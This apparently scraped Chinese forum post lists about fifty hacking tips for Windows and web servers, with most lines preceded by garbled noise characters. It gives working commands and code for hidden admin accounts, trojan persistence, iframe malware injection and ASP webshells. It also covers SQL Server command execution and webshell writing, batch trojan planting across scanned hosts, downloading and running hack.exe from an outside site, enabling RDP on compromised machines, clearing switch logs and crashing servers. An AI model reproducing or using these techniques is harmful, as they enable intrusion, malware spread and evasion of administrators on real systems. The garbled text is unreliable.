1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
0 K% Q, i3 `8 Q. s3 Scacls C:\windows\system32 /G hqw20:R
4 s5 }+ J ]4 b. h4 m; W. `思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
% O8 J6 ~1 U! z9 t6 Y+ r6 E恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
' i; D6 V; \) q+ O; E, ~
& V& A0 r6 D+ {# i8 L5 e2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% i% ~, l! W: e8 O
. N- i4 [" X' Y8 c( a) P7 y3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。$ f, W# a) u1 t6 j* _' U6 x8 s
2 w ~; R, N) x: h. r% U- Q4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号- C, F9 V: J! i/ g, P9 v, F
_- }; f# M5 ^1 E4 V1 l
5、利用INF文件来修改注册表8 k; }2 G1 q% k8 g: u! ]+ f
[Version]
! }; w! H, m! q! i0 k- c2 `. l1 aSignature="$CHICAGO$"5 M- }% h' R/ V# a3 f
[Defaultinstall]
' M k4 U3 U7 e; m- `" C N3 |2 paddREG=Ating
) \6 G% R) N% D5 M- N: W[Ating]
" Y5 N& S( \7 e5 T+ t( tHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"& m: _# q! X: P, w0 q
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
/ [0 E$ O; H( ^* crundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
" N9 {" ?- `8 f' o$ F其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU" j5 g8 H- l7 G# m1 v
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU8 X( P: z0 x t# r
HKEY_CURRENT_CONFIG 简写为 HKCC* l2 Z8 w$ p2 A: U% F7 }
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
5 O2 F3 c+ z m" ?"1"这里代表是写入或删除注册表键值中的具体数据
: f% W; v) I' s k: @
) I6 j0 a8 S3 m* `8 J6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,+ H5 j! ^, h6 l( `
多了一步就是在防火墙里添加个端口,然后导出其键值
& i3 Y D" a9 W5 a% b[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]9 \9 o; d4 K3 [. `
% E/ y3 N7 H/ j, N, T. r; G4 l
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽5 ~7 z+ N$ C) ?/ ?) ~& @
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。8 I8 ?& ^' {: G1 x
& [* n& |# R. y6 f; h, n$ i9 x! c' t
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。& d! W. O" L6 m8 o
. H8 `% R U( i
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ I/ A- s( f; |9 m4 ^ ?7 j" z8 b Y
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
* F% w& B! ~' \4 `
* @; D S0 O9 s3 T) M* u' G( K10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
* n* K0 q: E6 b3 m) c5 L
4 i9 X$ E' G6 }& F11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 x. m6 w9 n1 s: [) m P$ L. }8 @用法:xsniff –pass –hide –log pass.txt7 H1 q+ ~6 L, F0 x' U4 z
`4 `7 E- Y1 q8 W5 {# a c
12、google搜索的艺术
& ?7 ~9 N. {% Z5 Z, L/ d搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”; _3 M. T$ x- ^, F
或“字符串的语法错误”可以找到很多sql注入漏洞。
V) l4 x2 K' Q9 T, q# }/ N" `
) T! B5 F; @7 x$ g: G13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。/ J& F, h7 \4 g
! a) i3 U5 `/ T; x. v$ A14、cmd中输入 nc –vv –l –p 1987. b8 B& u/ F* ]! x! Z
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
% A0 ~5 S+ m. r/ {/ T: e/ R# ~3 z5 T, X) b. {
15、制作T++木马,先写个ating.hta文件,内容为4 E$ d6 p* `: r: d& i0 ]
<script language="VBScript">5 t, l1 I/ s4 T+ ^* y. ]
set wshshell=createobject ("wscript.shell" )
4 V7 t+ m6 n5 _* L% ?a=wshshell.run("你马的名称",1)
+ G1 g/ m9 @/ E+ Swindow.close
" X9 c2 E; ?) s X</script>: M7 L) y$ q2 R* f6 T( N
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
$ `: a6 R2 R/ u* }/ \# _" a* H
# ?, e% f0 w" N% [6 u16、搜索栏里输入5 R! }! M( V5 T7 w( c; c( o
关键字%'and 1=1 and '%'='
4 O. \) z M( f% a! h关键字%'and 1=2 and '%'='
8 D; B- ^9 I2 [9 I4 b% N比较不同处 可以作为注入的特征字符, r# L! J& T; z0 U" o/ Y8 H) e
/ ^8 Q) L8 P2 u4 O# r/ Z17、挂马代码<html>* ]' f2 {4 p, ?. q# \6 V
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
1 g. H: C# X* q" @ C# Y. M</html>) ] n( k& d" N: z& `7 r+ m
* O5 e7 k- Y7 G$ n! y" M18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
j" }% N( D% nnet localgroup administrators还是可以看出Guest是管理员来。
& L4 L9 z. `5 A" M8 o* s3 Z
7 c b* S* k2 U) T+ L19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
7 G. ^; C7 |+ R2 D' Y用法: 安装: instsrv.exe 服务名称 路径5 u/ I- L- A/ e" z: T- r- s3 M
卸载: instsrv.exe 服务名称 REMOVE
& \1 y& I& j' ?3 A0 P3 V) \# M
* B$ b; J; E$ ^$ D
' }; N3 j6 b0 B# `21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
- U% c% {2 e0 p5 x0 Y不能注入时要第一时间想到%5c暴库。
4 {0 L. Y" s2 D
. `, b$ B2 u5 q9 T: i22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~, g- Z1 e$ I! K
% y- W9 } N9 A
23、缺少xp_cmdshell时9 L* g7 _* d1 g7 J4 i: a
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
K- i/ z. N: X( {7 H假如恢复不成功,可以尝试直接加用户(针对开3389的)
# m2 c! p9 a; k( ]/ L9 sdeclare @o int( G# |6 X+ N: [' J$ Y9 E" r
exec sp_oacreate 'wscript.shell',@o out
8 Y' ]/ i; v$ G7 T9 jexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员8 I* f6 O' F, P* e* O
. m s9 G, P7 N8 S5 Z& L* w( B24.批量种植木马.bat( N. w( ?4 g! C1 |& ^& Z1 P
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中; V5 [0 c7 `( a5 F& Y) I) V
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间# A: V1 u# Z9 A( @2 o" g; W
扫描地址.txt里每个主机名一行 用\\开头 [, S v# s0 Z6 f) C& s
* P7 T1 w z( I: \7 e
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。5 m$ K' }3 t, b; a3 n$ ]
; @5 m+ U6 ]. g26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.. O4 Y+ V: N9 o: }
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.! Z1 [- f5 h5 t( w) D8 ^
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马- ?0 n+ L; R$ c
5 j8 r& B& e. k7 z a, j* d& D27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
5 |# _( g& r: S5 o然后用#clear logg和#clear line vty *删除日志
- c4 b# M: M B/ Q2 B2 w) E* w/ E
6 P& K! B Y; e) B28、电脑坏了省去重新安装系统的方法 T9 b0 i# k, @
纯dos下执行,/ ?" V, ^/ d6 o- ]- M
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
0 @ n# e$ R# | b2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config; k/ _9 T( {! t
, [3 x& l+ r+ I9 k. j29、解决TCP/IP筛选 在注册表里有三处,分别是:
+ j2 M1 b$ M& {0 `4 G" jHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
9 u$ i( F: p+ c9 ^) wHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' p; [3 W- r7 iHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. o. c# b7 ^7 w; N7 d2 s/ g分别用
9 x) ]1 p$ B% c6 ?% d/ M% Pregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ P& |3 p/ C7 Q8 w; Pregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ R: ~, @! f* y* ~7 E5 x/ {4 g9 wregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 A8 B. O3 S; I; I" E- `/ a ^
命令来导出注册表项4 b" @' E) I9 r2 g5 H
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
0 l+ I% z8 h) _/ U( t3 j改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用' d/ r0 q _: {/ x% p+ \
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& ]1 H# l, X6 w- h( q: r! ? T' y+ p7 H
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
" Q- e) E; B3 z9 q" aSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的38 j4 s |! J* e0 L
, s! }% x& P9 J& b) c
31、全手工打造开3389工具
. D0 e; s) K& Y: W打开记事本,编辑内容如下:5 a. C8 o$ [$ A' d
echo [Components] > c:\sql
4 i- P9 b% U% uecho TSEnable = on >> c:\sql$ R9 c8 M! E% M2 A# O
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
; g- U7 v+ j6 m3 R% r/ z编辑好后存为BAT文件,上传至肉鸡,执行
1 c5 B" n4 q- o1 L3 S3 Z* Z% T" n. G B4 w
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
; l8 t3 J0 t# C; @9 s8 ]$ @8 X. ^, J& u3 Y' g3 W2 i
33、让服务器重启
1 S9 N5 b( l \. m3 f写个bat死循环:
, L- p. b1 E) ~@echo off x' Y# ?$ u" G5 ~% I; o! w, b
:loop1
" l4 o, y: p3 i: Qcls7 F: M1 _; W7 ~7 M0 K
start cmd.exe
+ w+ ]/ f% x% \& J, x8 n1 \8 Hgoto loop1
' |8 I) R; S3 i) T/ u1 }保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
3 _' [9 w3 g0 T2 w; m# d* D4 ]: z! B" Q F6 b3 E
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
: K8 l, l% K! A0 D! A) O) o, x@echo off
$ L' R' @# [8 F( f o% G$ o8 {date /t >c:/3389.txt( T T% f R I k6 l+ u
time /t >>c:/3389.txt) M9 F; v- Y, z# m7 g0 ]
attrib +s +h c:/3389.bat
+ J0 S& ^2 A* u, ?+ z1 o" D) i* x: I, Rattrib +s +h c:/3389.txt
9 @. a/ [* R1 C S5 G( ~ l6 G& Qnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
" `' B8 w# A" f并保存为3389.bat6 u. q( P$ E5 o2 s3 i3 w' g/ V& z" `3 g
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
/ V! H; W) W& d: Q
`9 G! r7 [( q35、有时候提不了权限的话,试试这个命令,在命令行里输入:4 S8 r/ c3 G1 J* K+ v ]- _
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
& M2 C5 J y, B% b2 l# }9 O/ O输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
$ Z+ N# M# q5 T# u6 e, G# W) A/ }8 a
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件+ y+ d7 S# ~0 J+ d7 k
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
, d, S7 D) v5 |/ I1 u) G: ]echo 你的FTP账号 >>c:\1.bat //输入账号; h7 Y0 s. E7 b. a
echo 你的FTP密码 >>c:\1.bat //输入密码/ B& N) K6 o# d' d4 E% A
echo bin >>c:\1.bat //登入- t. j6 O% g' T! O
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么" S0 ^$ O& k4 C8 F( Y: G
echo bye >>c:\1.bat //退出
8 \& j. d$ d6 K* V6 I0 @然后执行ftp -s:c:\1.bat即可
6 Q, ~- h/ @5 X9 a9 m
- X7 ?/ R+ j! s: j* t37、修改注册表开3389两法; M* n' I& ~5 c: ]; w! z; G4 j
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
* j% ?9 e- [5 W2 B& Qecho Windows Registry Editor Version 5.00 >>3389.reg
+ j) e* }, B/ }9 T0 \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
% @% d+ O) {; Q5 S; S! necho "Enabled"="0" >>3389.reg
3 P! M% |: }7 y5 Y! vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
" Q9 y& g% G, D" h8 z1 ^) w3 [NT\CurrentVersion\Winlogon] >>3389.reg( {9 |# y/ k" ~$ Y& `
echo "ShutdownWithoutLogon"="0" >>3389.reg
$ [6 Y( A2 R, }9 d6 ^/ h! M# F8 K' @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]- m( G6 l. S# y; g3 u- y; k3 _
>>3389.reg- I) ]; n6 ]5 [, _
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg4 B* m: ]3 O6 Z2 _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
' K0 R- k( L9 z+ P6 Z( G$ o>>3389.reg
# q6 h% R& {9 Y' yecho "TSEnabled"=dword:00000001 >>3389.reg. i H: r) M& y! M f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
- @8 N- \3 K2 E% S- x3 ~& c) V9 Hecho "Start"=dword:00000002 >>3389.reg0 K" n" z1 O) z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
) P' C6 v/ B- D4 E; q# `3 h5 c>>3389.reg
1 a+ G) E, p5 n0 w7 M; secho "Start"=dword:00000002 >>3389.reg P. p4 j4 E; F' L/ D! }
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
* {( J4 o0 T6 Aecho "Hotkey"="1" >>3389.reg# A' _& B9 l; f# m4 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 J5 ^0 Q. ~( P9 G( oServer\Wds\rdpwd\Tds\tcp] >>3389.reg
2 E; a& {5 ?6 l# O lecho "PortNumber"=dword:00000D3D >>3389.reg
+ L# E! Y- Y" Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ h3 X, A/ i. l
Server\WinStations\RDP-Tcp] >>3389.reg
! ?; \0 e* r/ c I. e" \+ M+ E) secho "PortNumber"=dword:00000D3D >>3389.reg
# {0 i, I7 J2 ^# s把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。) w" L6 o+ A N# t( V
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)1 h$ [ j# U3 S" D' K6 o# o) ?
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
, u. o, q( X' z& h$ Z(2)winxp和win2003终端开启
1 X) u1 N3 o7 `+ A: U" u, A/ u, h1 }用以下ECHO代码写一个REG文件:2 D; P: m$ C9 ]% o) b
echo Windows Registry Editor Version 5.00>>3389.reg
9 M+ f0 I- M- e. I" Z3 F' p4 \ Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 m) S/ `" l. I, U6 U% m) Q" O
Server]>>3389.reg
# D8 A! j* r- ^, becho "fDenyTSConnections"=dword:00000000>>3389.reg8 ^( C, A! ~# `& y/ y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! d, ]% D) w. A) i" Q/ {4 x' q
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
: L" m) {0 E7 s! Y+ @echo "PortNumber"=dword:00000d3d>>3389.reg
4 z5 g+ V- {) ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 j8 d9 [# J$ {/ Y* h! JServer\WinStations\RDP-Tcp]>>3389.reg) \6 \9 F" H! x B
echo "PortNumber"=dword:00000d3d>>3389.reg
% |4 Z7 g* _* F' c$ E然后regedit /s 3389.reg del 3389.reg
- t ]/ g( W( O; E! \, @XP下不论开终端还是改终端端口都不需重启
' J$ ^! L. [3 K9 s3 \, g! _% L& m7 q7 w: K3 G# c/ j
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
1 {6 w6 c0 X; @ D% ]用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', W; b7 q( i' r% h3 j0 _+ \
5 `: B6 T$ X5 C3 @: N( a A5 C: G
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!5 e7 ~3 V2 B, E( A0 o6 }9 W; P
(1)数据库文件名应复杂并要有特殊字符
& N ^% J3 P. m$ ?(2)不要把数据库名称写在conn.asp里,要用ODBC数据源0 G/ x, V; W5 X: f- H
将conn.asp文档中的
6 j/ D+ B# `2 L5 }7 ]9 @7 xDBPath = Server.MapPath("数据库.mdb")8 e2 N- v6 v, ~' S3 N% [# X
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
" S1 d& C ?6 h& @% M
3 X4 O G9 [% C修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
7 k* p5 ` D; g* H" P$ B(3)不放在WEB目录里! d; @$ ]; ?7 O0 {3 C3 @' r
+ V- K: V$ M* {$ ~+ j
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
u/ R5 y9 z# k( A' r. \4 d, N* q- c可以写两个bat文件
! X* ]) t! O1 z h& M/ o% ]/ t@echo off
6 j( X. U$ X% @6 Y9 V; B1 |@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
. i5 ?- L8 b% h@del c:\winnt\system32\query.exe2 U+ F. N A/ y7 i- y1 X7 ?$ h$ }+ b5 r
@del %SYSTEMROOT%\system32\dllcache\query.exe
5 ?- {5 C$ h3 j% c; K; V1 K@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的3 i" O& M& p; g2 o
; \+ v& _3 J' o@echo off8 j6 _8 P: H; r* Y7 i5 D
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
5 x! h: u5 Z3 u! B0 D@del c:\winnt\system32\tsadmin.exe
& b8 Y/ q, ^* N* ]@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex5 o+ f- T% }. i" W+ a
1 L) m* ]. N+ Z/ V7 T6 E41、映射对方盘符9 B y2 N8 P# i
telnet到他的机器上,2 L, X* i! M4 Y( Q8 w: H
net share 查看有没有默认共享 如果没有,那么就接着运行# F" @+ f) M8 Y3 E
net share c$=c:
8 D* ]7 B0 K8 I2 @, T$ N9 ynet share现在有c$
7 \, Z! J; ^& X7 R在自己的机器上运行
: G* c) b3 c/ }( Knet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
! N8 [! t0 L ?. |/ E3 `! v
: ~6 k; g% K) n6 o; |3 f42、一些很有用的老知识
- f: v% E/ N; z. d8 o+ Wtype c:\boot.ini ( 查看系统版本 )
7 S& N+ |9 h6 z: [9 K, w% {net start (查看已经启动的服务)$ r& H O/ N8 x1 t# W% z$ @, p: [
query user ( 查看当前终端连接 )
& \0 g( `6 D0 \( m) T8 o9 vnet user ( 查看当前用户 ). [3 k2 k9 H" C4 S/ T9 a
net user 用户 密码/add ( 建立账号 )
( p+ k/ `9 k9 ?! S nnet localgroup administrators 用户 /add (提升某用户为管理员)! f6 U+ A9 x; i; W
ipconfig -all ( 查看IP什么的 )
) \+ `6 N! [$ F0 G8 wnetstat -an ( 查看当前网络状态 ): c+ \' A% E, h) r
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)4 k/ v. `3 m3 M' {5 `1 Q9 W" n
克隆时Administrator对应1F4 s" e( ]& p' d: G$ g
guest对应1F56 ~6 l. H) f3 L, g
tsinternetuser对应3E8
0 c( L5 D# [6 B0 a
5 d d0 l; U/ I& T! P$ C& n5 f43、如果对方没开3389,但是装了Remote Administrator Service& Z7 s( s3 N- h' P3 X v( |) F- e. k
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
- v# T8 W; j% ]) w& G解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
7 P' |, z8 a; I v# v先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
+ J5 P) k0 S& n
" |+ d; k+ n* @! o9 A) R0 m44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)7 S1 Y& u' l; F) s. @
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
2 \0 _. f: e5 p' V0 b+ Q2 T5 g: c$ O9 ?& l: d
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
4 w! Y x# x* u2 S0 m4 h: Decho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
* S v" E S1 j2 o/ w^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =8 S9 J& u$ l/ r
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =) {- p/ @7 n! b: _
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
% ?0 K% |9 G! @# g(这是完整的一句话,其中没有换行符)
+ P( T" `2 L6 {9 F' x然后下载:
Q; t' t4 d1 `+ D0 n0 j. f! l) {7 Pcscript down.vbs http://www.hack520.org/hack.exe hack.exe) R$ a' m, o; m3 C6 Y
5 h% {& e& b7 F% J4 {& n
46、一句话木马成功依赖于两个条件:3 U; }2 O4 m( M6 Z
1、服务端没有禁止adodb.Stream或FSO组件
. W& l, v8 r! X2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
; i; b. y3 L" {5 o/ g9 E0 l4 f
7 w6 e! q( a' R. D# F5 e# I* C47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. P5 b3 i* a5 N& J% d! `;alter database utsz set RECOVERY FULL--
0 T2 ?- w' }4 ~. R6 d;create table cmd (a image)-- e# K, [; o# h. M& ]) w
;backup log utsz to disk = 'D:\cmd' with init--! U# F1 N5 ?( P" y, i3 T) N9 y/ ]- a
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
) L3 ]- A) l% U: b' }3 C;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--6 Z7 n+ |* ^- N% E0 t: t
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。$ {& \+ e; y# c! V- n+ }" |
& f$ O) ~; t4 l3 h* U
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:9 M8 H0 g) \3 D' L& g
2 E, {/ t$ K5 a5 }% L" }# Y# c用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options. o7 _# W, F4 _4 D U0 ?
所有会话用 'all'。
" e# u5 ~ x8 D1 @4 W8 T4 w' |' l-s sessionid 列出会话的信息。
. \7 j! y/ l% p6 z: N-k sessionid 终止会话。
. W% s$ C- m6 m8 @) ~2 F1 z-m sessionid 发送消息到会话。
- y3 d* A9 I& B4 L4 j0 a3 s: W/ ?8 G% {/ t, a$ T0 }
config 配置 telnet 服务器参数。
7 p. n5 ]. P* t) d5 `% q3 p0 T' F% Y0 u' i3 _. E& P
common_options 为:
& N# s. I; r! {& y1 e-u user 指定要使用其凭据的用户
: Z5 v6 |% B& c2 o- G-p password 用户密码+ J8 q% P9 X) o# V; ?) Z
8 E& b* m) p6 Y( Kconfig_options 为:
; a' M/ e% l! h/ W, y# E: M9 S: ldom = domain 设定用户的默认域
6 p) ~: Q) @; e! V1 [; H) Sctrlakeymap = yes|no 设定 ALT 键的映射& U/ p0 ? q* N4 E& R- }( u
timeout = hh:mm:ss 设定空闲会话超时值
$ y! m x2 [8 R* C. k vtimeoutactive = yes|no 启用空闲会话。5 k: d* o# l/ |" ]9 k
maxfail = attempts 设定断开前失败的登录企图数。
$ y5 B# j- N# d9 P* k# vmaxconn = connections 设定最大连接数。" T! h5 I2 y. T: A H& e
port = number 设定 telnet 端口。$ S# c" K" h) @$ X R7 z# l
sec = [+/-]NTLM [+/-]passwd
0 y% s: B& ^+ O7 l$ E" `* r设定身份验证机构
$ {4 L; f! a8 D1 j# a7 Pfname = file 指定审计文件名。
3 k. b! d+ _% s1 ?fsize = size 指定审计文件的最大尺寸(MB)。1 V0 R5 X2 x1 N
mode = console|stream 指定操作模式。
. ?) ^ ]+ `3 y! `, }6 \auditlocation = eventlog|file|both
/ Q- F$ z, m6 A1 \2 v& R指定记录地点% ~( ?' `. Y" D2 t$ {! F
audit = [+/-]user [+/-]fail [+/-]admin* |( F1 Q/ M, i: L
- l( p6 }3 v/ x* O% y1 @. ?
49、例如:在IE上访问:
; g H# J. x7 h2 Gwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
! }/ n* {. C: _4 a7 ]hack.txt里面的代码是:+ w/ I) @, U* Q: K( i: f4 y
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">; a1 f1 G7 J v+ w4 @9 p
把这个hack.txt发到你空间就可以了!/ `/ Q$ R# S. f- Z( {- v" a$ a
这个可以利用来做网马哦!! p% B4 q4 w6 N3 N3 p5 |* g
: @2 M/ Y3 S0 M1 B) \
50、autorun的病毒可以通过手动限制!" j1 z4 B( d: H# F6 C* j
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!0 w+ B; @8 k9 W
2,打开盘符用右键打开!切忌双击盘符~3 q3 n$ k3 n7 g: _3 K, `# |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!5 M/ {$ u/ j1 x* T" o
; A# T ?+ ~$ a5 N: B% ]: V51、log备份时的一句话木马:
% i5 H, v1 T3 Y k3 A! Sa).<%%25Execute(request("go"))%%25>) X) F- ]' X; j; {9 I7 [, {0 C
b).<%Execute(request("go"))%>5 M( Z' o: H! A5 z7 ^* I2 L
c).%><%execute request("go")%><%
4 y4 T5 j9 k/ P1 `& N" C& N2 od).<script language=VBScript runat=server>execute request("sb")</Script> Z) X8 ^2 s' E) m
e).<%25Execute(request("l"))%25>: S* k, J9 T( A" [# z1 N9 x
f).<%if request("cmd")<>"" then execute request("pass")%>
+ X* j' ]9 ~( D" y9 e9 _
: g" x0 j: o% o9 s" V+ }- g# ~! T52、at "12:17" /interactive cmd
! G: n6 a8 E( F6 \执行后可以用AT命令查看新加的任务' Q# B* U* x5 c6 d
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。1 r. `# D6 h9 g. Q( V% D$ a
: V- g2 w U W; c+ _0 t9 B4 ~
